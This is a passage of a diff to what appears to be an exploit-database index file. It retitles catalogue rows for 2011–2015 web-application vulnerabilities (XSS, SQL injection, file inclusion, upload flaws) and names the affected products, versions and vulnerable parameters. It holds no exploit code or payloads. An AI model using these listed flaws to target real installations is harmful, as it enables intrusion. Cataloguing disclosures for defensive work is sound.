Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 -35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Parameter Cross-Site Scripting",2011-04-25,"AutoSec Tools",php,webapps,0 +35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Cross-Site Scripting",2011-04-25,"AutoSec Tools",php,webapps,0 35662,platforms/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 -35664,platforms/php/webapps/35664.txt,"phpList 2.10.x - 'email' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 -35658,platforms/php/webapps/35658.txt,"html-edit CMS 3.1.x - 'html_output' Parameter Cross-Site Scripting",2011-04-26,KedAns-Dz,php,webapps,0 -35663,platforms/php/webapps/35663.txt,"WordPress Plugin WP Ajax Recent Posts 1.0.1 - 'do' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 +35664,platforms/php/webapps/35664.txt,"phpList 2.10.x - 'email' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 +35658,platforms/php/webapps/35658.txt,"html-edit CMS 3.1.x - 'html_output' Cross-Site Scripting",2011-04-26,KedAns-Dz,php,webapps,0 +35663,platforms/php/webapps/35663.txt,"WordPress Plugin WP Ajax Recent Posts 1.0.1 - 'do' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Inclusion / SQL Injection",2011-04-22,KedAns-Dz,php,webapps,0 35665,platforms/php/webapps/35665.txt,"PHP F1 Max's Photo Album - 'showimage.php' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35666,platforms/php/webapps/35666.txt,"Football Website Manager 1.1 - SQL Injection / Multiple HTML Injection Vulnerabilities",2011-04-26,RoAd_KiLlEr,php,webapps,0 -35667,platforms/php/webapps/35667.txt,"Joostina - Multiple Components SQL Injection",2011-04-27,KedAns-Dz,php,webapps,0 +35667,platforms/php/webapps/35667.txt,"Joostina (Multiple Components) - SQL Injection",2011-04-27,KedAns-Dz,php,webapps,0 35668,platforms/php/webapps/35668.txt,"up.time Software 5 - Administration Interface Remote Authentication Bypass",2011-04-27,"James Burton",php,webapps,0 35670,platforms/php/webapps/35670.txt,"Absolut Engine 1.73 - Multiple Vulnerabilities",2015-01-01,"Steffen Rösemann",php,webapps,80 35677,platforms/php/webapps/35677.txt,"eyeOS 1.9.0.2 - Image File Handling HTML Injection",2011-04-25,"Alberto Ortega",php,webapps,0 -35678,platforms/php/webapps/35678.txt,"phpGraphy 0.9.13b - 'theme_dir' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 +35678,platforms/php/webapps/35678.txt,"phpGraphy 0.9.13b - 'theme_dir' Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35679,platforms/php/webapps/35679.txt,"e107 2 Bootstrap CMS - Cross-Site Scripting",2015-01-03,"Ahmet Agar / 0x97",php,webapps,0 35680,platforms/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Inclusion / Arbitrary File Upload",2011-04-28,KedAns-Dz,php,webapps,0 35682,platforms/php/webapps/35682.txt,"Tine 2.0 - 'vbook.php' Cross-Site Scripting",2011-04-30,"AutoSec Tools",php,webapps,0 @@ -35019,12 +35020,12 @@ id,file,description,date,author,platform,type,port 35684,platforms/php/webapps/35684.txt,"LDAP Account Manager 3.4.0 - selfserviceSaveOk Parameter Cross-Site Scripting",2011-05-02,"AutoSec Tools",php,webapps,0 35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 - 'index.php' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35700,platforms/php/webapps/35700.txt,"YaPiG 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0 -35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 - 'lang' Parameter Cross-Site Scripting",2011-05-03,"AutoSec Tools",php,webapps,0 +35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 - 'lang' Cross-Site Scripting",2011-05-03,"AutoSec Tools",php,webapps,0 35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross-Site Scripting",2011-05-03,"Karan Khosla",cgi,webapps,0 35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - Cross-Site Scripting Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0 35713,platforms/php/webapps/35713.txt,"FestOS 2.3c - 'upload.php' Arbitrary File Upload",2011-05-08,KedAns-Dz,php,webapps,0 -35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Parameter Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 -35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products - 'theme_dir' Parameter Cross-Site Scripting",2011-05-03,Hector.x90,php,webapps,0 +35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 +35702,platforms/php/webapps/35702.txt,"GoT.MY (Multiple Products) - 'theme_dir' Cross-Site Scripting",2011-05-03,Hector.x90,php,webapps,0 35704,platforms/php/webapps/35704.txt,"WordPress Plugin WP Ajax Calendar 1.0 - 'example.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 - 'index.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35706,platforms/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 - Default Account / Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 @@ -35042,17 +35043,17 @@ id,file,description,date,author,platform,type,port 35722,platforms/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rösemann",php,webapps,80 35723,platforms/php/webapps/35723.txt,"TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injections",2011-05-01,"AutoSec Tools",php,webapps,0 35724,platforms/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 -35726,platforms/php/webapps/35726.py,"Getsimple 3.0 - 'set' Parameter Local File Inclusion",2011-05-07,"AutoSec Tools",php,webapps,0 +35726,platforms/php/webapps/35726.py,"Getsimple 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",php,webapps,0 35727,platforms/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,php,webapps,0 35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 35730,platforms/php/webapps/35730.txt,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,php,webapps,80 -35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' Parameter SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 +35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0 35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injections",2011-05-10,"High-Tech Bridge SA",php,webapps,0 35739,platforms/php/webapps/35739.txt,"Argyle Social - Multiple Cross-Site Scripting Vulnerabilities",2011-05-12,"High-Tech Bridge SA",php,webapps,0 -35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0 -35745,platforms/php/webapps/35745.txt,"Joomla! Component com_cbcontact - 'contact_id' Parameter SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 +35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Cross-Site Scripting",2011-05-13,MustLive,multiple,webapps,0 +35745,platforms/php/webapps/35745.txt,"Joomla! Component com_cbcontact - 'contact_id' SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"XLabs Security",hardware,webapps,0 35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0 35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0 @@ -35060,13 +35061,13 @@ id,file,description,date,author,platform,type,port 35752,platforms/php/webapps/35752.txt,"Mambo Component Docman 1.3.0 - Multiple SQL Injections",2011-05-16,KedAns-Dz,php,webapps,0 35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0 -35756,platforms/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Parameter Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 +35756,platforms/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 35757,platforms/php/webapps/35757.txt,"eFront 3.6.9 - 'scripts.php' Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps,0 35759,platforms/php/webapps/35759.txt,"eFront 3.6.9 - 'submitScore.php' Cross-Site Scripting",2011-05-16,"John Leitch",php,webapps,0 35760,platforms/php/webapps/35760.txt,"PHP Calendar Basic 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-17,"High-Tech Bridge SA",php,webapps,0 -35761,platforms/php/webapps/35761.txt,"TWiki 5.0.1 - 'origurl' Parameter Cross-Site Scripting",2011-05-18,"Mesut Timur",php,webapps,0 +35761,platforms/php/webapps/35761.txt,"TWiki 5.0.1 - 'origurl' Cross-Site Scripting",2011-05-18,"Mesut Timur",php,webapps,0 35767,platforms/php/webapps/35767.txt,"Gecko CMS 2.3 - Multiple Vulnerabilities",2015-01-13,LiquidWorm,php,webapps,80 -35998,platforms/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script - 'cid' Parameter SQL Injection",2011-07-25,Ehsan_Hp200,php,webapps,0 +35998,platforms/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script - 'cid' SQL Injection",2011-07-25,Ehsan_Hp200,php,webapps,0 35786,platforms/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",multiple,webapps,80 35770,platforms/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan_ Koh",hardware,webapps,623 35775,platforms/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888 @@ -35074,36 +35075,36 @@ id,file,description,date,author,platform,type,port 35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross-Site Scripting",2011-05-19,"AutoSec Tools",php,webapps,0 35783,platforms/php/webapps/35783.html,"Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' PHP Remote Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0 35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0 -35788,platforms/php/webapps/35788.txt,"Joomla! Component Map Locator - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0 +35788,platforms/php/webapps/35788.txt,"Joomla! Component Map Locator - 'cid' SQL Injection",2011-05-23,FL0RiX,php,webapps,0 35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0 35791,platforms/php/webapps/35791.txt,"Ajax Chat 1.0 - 'ajax-chat.php' Cross-Site Scripting",2011-05-24,"High-Tech Bridge SA",php,webapps,0 35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 - Multiple SQL Injections",2011-05-30,KedAns-Dz,php,webapps,0 35796,platforms/php/webapps/35796.txt,"MidiCMS Website Builder - Local File Inclusion / Arbitrary File Upload",2011-05-25,KedAns-Dz,php,webapps,0 35797,platforms/php/webapps/35797.txt,"Joomla! Component com_shop - SQL Injection",2011-05-25,"ThunDEr HeaD",php,webapps,0 -35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 - '_kurl' Parameter Cross-Site Scripting",2011-05-25,"AutoSec Tools",php,webapps,0 -35802,platforms/cgi/webapps/35802.txt,"BlackBoard Learn 8.0 - 'keywordraw' Parameter Cross-Site Scripting",2011-05-25,"Matt Jezorek",cgi,webapps,0 -35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 - 'userContextMenu_Parameter' Parameter Cross-Site Scripting",2011-05-31,LiquidWorm,asp,webapps,0 +35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 - '_kurl' Cross-Site Scripting",2011-05-25,"AutoSec Tools",php,webapps,0 +35802,platforms/cgi/webapps/35802.txt,"BlackBoard Learn 8.0 - 'keywordraw' Cross-Site Scripting",2011-05-25,"Matt Jezorek",cgi,webapps,0 +35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 - 'userContextMenu_Parameter' Cross-Site Scripting",2011-05-31,LiquidWorm,asp,webapps,0 35808,platforms/php/webapps/35808.txt,"S9Y Serendipity Freetag-plugin 3.21 - 'index.php' Cross-Site Scripting",2011-05-31,"Stefan Schurtz",php,webapps,0 35814,platforms/php/webapps/35814.txt,"TEDE Simplificado 1.01/S2.04 - Multiple SQL Injections",2011-06-01,KnocKout,php,webapps,0 35815,platforms/php/webapps/35815.pl,"PikaCMS - Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0 35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injections",2011-06-01,"High-Tech Bridge SA",php,webapps,0 -35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 - 'range' Parameter SQL Injection",2011-06-02,"Gjoko Krstic",php,webapps,0 +35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 - 'range' SQL Injection",2011-06-02,"Gjoko Krstic",php,webapps,0 35823,platforms/php/webapps/35823.txt,"WordPress Plugin Pie Register 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80 -35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 - 'sortorder' Parameter Cross-Site Scripting",2011-06-06,Mr.ThieF,php,webapps,0 -35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 - report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 -35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 +35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 - 'sortorder' Cross-Site Scripting",2011-06-06,Mr.ThieF,php,webapps,0 +35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'report_marketing.php?exc[]' SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 +35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'billable_incidents.php?sites[]' SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35984,platforms/php/webapps/35984.txt,"Joomla! Component com_virtualmoney 1.5 - SQL Injection",2011-07-25,FL0RiX,php,webapps,0 35826,platforms/php/webapps/35826.txt,"Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload",2011-06-06,KedAns-Dz,php,webapps,0 -35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross-Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0 +35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Cross-Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0 35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes Themes - 'test.php' Cross-Site Scripting",2011-06-06,MustLive,php,webapps,0 35831,platforms/php/webapps/35831.txt,"PopScript - 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0 35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 - 'colour_picker.php' Cross-Site Scripting",2011-06-06,"Patrick Webster",php,webapps,0 -35833,platforms/php/webapps/35833.txt,"Xataface 1.x - 'action' Parameter Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 +35833,platforms/php/webapps/35833.txt,"Xataface 1.x - 'action' Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 35834,platforms/php/webapps/35834.txt,"Blog:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0 -35835,platforms/php/webapps/35835.txt,"WordPress Plugin GD Star Rating - 'votes' Parameter SQL Injection",2011-06-08,anonymous,php,webapps,0 -35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 - 'email' Parameter Cross-Site Scripting",2011-06-07,LiquidWorm,php,webapps,0 -35838,platforms/php/webapps/35838.txt,"Tolinet Agencia - 'id' Parameter SQL Injection",2011-06-10,"Andrea Bocchetti",php,webapps,0 -35839,platforms/php/webapps/35839.txt,"Joomla! Component Minitek FAQ Book 1.3 - 'id' Parameter SQL Injection",2011-06-13,kaMtiEz,php,webapps,0 +35835,platforms/php/webapps/35835.txt,"WordPress Plugin GD Star Rating - 'votes' SQL Injection",2011-06-08,anonymous,php,webapps,0 +35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 - 'email' Cross-Site Scripting",2011-06-07,LiquidWorm,php,webapps,0 +35838,platforms/php/webapps/35838.txt,"Tolinet Agencia - 'id' SQL Injection",2011-06-10,"Andrea Bocchetti",php,webapps,0 +35839,platforms/php/webapps/35839.txt,"Joomla! Component Minitek FAQ Book 1.3 - 'id' SQL Injection",2011-06-13,kaMtiEz,php,webapps,0 35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0 35846,platforms/php/webapps/35846.txt,"WordPress Plugin Pixarbay Images 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 @@ -35120,15 +35121,15 @@ id,file,description,date,author,platform,type,port 35865,platforms/php/webapps/35865.txt,"Nibbleblog - Multiple SQL Injections",2011-06-19,KedAns-Dz,php,webapps,0 35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 - Cross-Site Scripting / SQL Injection",2011-06-18,KedAns-Dz,php,webapps,0 35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting",2011-06-18,Bl4ck.Viper,php,webapps,0 -35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Parameter Cross-Site Scripting",2011-06-21,"Gjoko Krstic",php,webapps,0 +35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Cross-Site Scripting",2011-06-21,"Gjoko Krstic",php,webapps,0 35872,platforms/asp/webapps/35872.txt,"H3C ER5100 - Authentication Bypass",2011-06-22,128bit,asp,webapps,0 35874,platforms/php/webapps/35874.txt,"Eshop Manager - Multiple SQL Injections",2011-06-22,"Number 7",php,webapps,0 -35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Parameter Cross-Site Scripting",2011-06-22,"High-Tech Bridge SA",php,webapps,0 -35877,platforms/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Parameter Directory Traversal",2011-06-23,"Andrea Bocchetti",php,webapps,0 +35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Cross-Site Scripting",2011-06-22,"High-Tech Bridge SA",php,webapps,0 +35877,platforms/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Directory Traversal",2011-06-23,"Andrea Bocchetti",php,webapps,0 35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication Bypass",2015-01-22,"Manish Tanwar",php,webapps,0 35879,platforms/php/webapps/35879.txt,"WordPress Plugin Cforms 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0 -35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0 -35883,platforms/php/webapps/35883.txt,"Joomla! Component com_morfeoshow - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0 +35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0 +35883,platforms/php/webapps/35883.txt,"Joomla! Component com_morfeoshow - 'idm' SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0 35884,platforms/php/webapps/35884.txt,"Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities",2011-06-27,"Aung Khant",php,webapps,0 35890,platforms/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,0 35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080 @@ -35143,66 +35144,66 @@ id,file,description,date,author,platform,type,port 35908,platforms/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,multiple,webapps,0 35910,platforms/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / Cross-Site Scripting",2015-01-26,"Sepahan TelCom IT Group",jsp,webapps,0 35911,platforms/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",multiple,webapps,0 -36313,platforms/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI Cross-Site Scripting",2011-11-17,"High-Tech Bridge SA",php,webapps,0 +36313,platforms/php/webapps/36313.txt,"webERP 4.3.8 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-17,"High-Tech Bridge SA",php,webapps,0 35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080 -35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 - tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 -35989,platforms/php/webapps/35989.txt,"MBoard 1.3 - 'url' Parameter URI redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0 +35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 - 'tasks.php?selected[]' SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 +35989,platforms/php/webapps/35989.txt,"MBoard 1.3 - 'url' URI Redirection",2011-07-27,"High-Tech Bridge SA",php,webapps,0 35990,platforms/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",php,webapps,0 35991,platforms/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rösemann",php,webapps,80 35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80 35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0 35916,platforms/php/webapps/35916.txt,"WordPress Plugin Photo Gallery 1.2.5 - Unrestricted Arbitrary File Upload",2014-11-11,"Kacper Szurek",php,webapps,80 -35922,platforms/php/webapps/35922.txt,"Joomla! Component com_jr_tfb - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0 +35922,platforms/php/webapps/35922.txt,"Joomla! Component com_jr_tfb - 'Controller' Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0 35923,platforms/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injections",2011-07-02,Net.Edit0r,asp,webapps,0 -35926,platforms/asp/webapps/35926.txt,"eTAWASOL - 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0 +35926,platforms/asp/webapps/35926.txt,"eTAWASOL - 'id' SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0 35927,platforms/php/webapps/35927.txt,"Classified Script - c-BrowseClassified URL Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0 35929,platforms/php/webapps/35929.txt,"Joomla! Component com_voj - SQL Injection",2011-07-08,CoBRa_21,php,webapps,0 -35930,platforms/php/webapps/35930.txt,"Prontus CMS - 'page' Parameter Cross-Site Scripting",2011-07-11,Zerial,php,webapps,0 -35931,platforms/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' Parameter SQL Injection",2011-07-11,kaMtiEz,php,webapps,0 +35930,platforms/php/webapps/35930.txt,"Prontus CMS - 'page' Cross-Site Scripting",2011-07-11,Zerial,php,webapps,0 +35931,platforms/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' SQL Injection",2011-07-11,kaMtiEz,php,webapps,0 35933,platforms/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Sepahan TelCom IT Group",hardware,webapps,0 35940,platforms/php/webapps/35940.txt,"Sphider 1.3.x - Admin Panel Multiple SQL Injections",2011-07-12,"Karthik R",php,webapps,0 -35941,platforms/multiple/webapps/35941.txt,"Flowplayer 3.2.7 - 'linkUrl' Parameter Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",multiple,webapps,0 +35941,platforms/multiple/webapps/35941.txt,"Flowplayer 3.2.7 - 'linkUrl' Cross-Site Scripting",2011-07-12,"Szymon Gruszecki",multiple,webapps,0 35942,platforms/php/webapps/35942.txt,"TCExam 11.2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,"Gjoko Krstic",php,webapps,0 -35943,platforms/php/webapps/35943.txt,"Chyrp 2.x - admin/help.php Multiple Parameter Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps,0 -35944,platforms/php/webapps/35944.txt,"Chyrp 2.x - includes/JavaScript.php action Parameter Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps,0 +35943,platforms/php/webapps/35943.txt,"Chyrp 2.x - 'admin/help.php' Multiple Cross-Site Scripting Vulnerabilities",2011-07-13,Wireghoul,php,webapps,0 +35944,platforms/php/webapps/35944.txt,"Chyrp 2.x - 'includes/JavaScript.php?action' Cross-Site Scripting",2011-07-13,Wireghoul,php,webapps,0 35945,platforms/php/webapps/35945.txt,"Chyrp 2.x - URI action Parameter Traversal Local File Inclusion",2011-07-29,Wireghoul,php,webapps,0 35946,platforms/php/webapps/35946.txt,"Chyrp 2.x - 'includes/lib/gz.php' File Parameter Traversal Arbitrary File Access",2011-07-29,Wireghoul,php,webapps,0 35947,platforms/php/webapps/35947.txt,"Chyrp 2.x - swfupload Extension upload_handler.php Arbitrary File Upload / Arbitrary PHP Code Execution",2011-07-29,Wireghoul,php,webapps,0 35950,platforms/php/webapps/35950.txt,"NPDS CMS REvolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",php,webapps,80 -35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox - 'id' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0 -35955,platforms/php/webapps/35955.txt,"Easy Estate Rental - 's_location' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0 -35956,platforms/php/webapps/35956.txt,"Joomla! Component Foto - 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0 -35958,platforms/php/webapps/35958.txt,"Joomla! Component Juicy Gallery - 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0 +35954,platforms/php/webapps/35954.txt,"Auto Web Toolbox - 'id' SQL Injection",2011-07-15,Lazmania61,php,webapps,0 +35955,platforms/php/webapps/35955.txt,"Easy Estate Rental - 's_location' SQL 